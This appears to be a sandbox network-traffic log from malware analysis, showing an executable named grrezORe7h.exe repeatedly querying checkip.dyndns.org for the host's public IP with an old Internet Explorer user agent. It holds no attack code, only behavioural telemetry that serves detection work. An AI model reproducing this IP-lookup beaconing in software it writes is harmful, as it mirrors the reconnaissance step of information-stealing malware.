Jan 11, 2025 07:24:07.400283098 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 07:24:07.587101936 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49816	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:08.688849926 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 07:24:09.336906910 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49826	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:10.294660091 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:10.950201035 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49838	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:11.963365078 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:12.607991934 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49851	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:13.507854939 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:14.137198925 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49862	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:14.980933905 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:15.616818905 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49879	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:16.759533882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:17.406584978 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49891	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:18.328382969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:18.954214096 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49903	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:19.921390057 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:20.544184923 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49915	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:21.394246101 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:22.039782047 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49927	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:22.953865051 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:23.591645956 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49939	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:24.588469982 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:25.233091116 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49951	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:26.138719082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:26.784008026 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49963	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:27.625197887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:28.274966002 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49975	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:29.314448118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:29.942653894 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49987	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:30.799271107 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:31.444658995 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49999	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:32.459240913 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:33.106791973 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50011	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:34.080444098 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:34.716219902 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50024	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:35.674964905 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:36.315814018 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50038	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:37.271446943 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:37.912435055 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50045	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:38.814771891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:39.440491915 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50047	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:40.343822002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:40.979767084 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50049	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:41.919287920 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:42.564404011 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50051	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:43.484508038 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
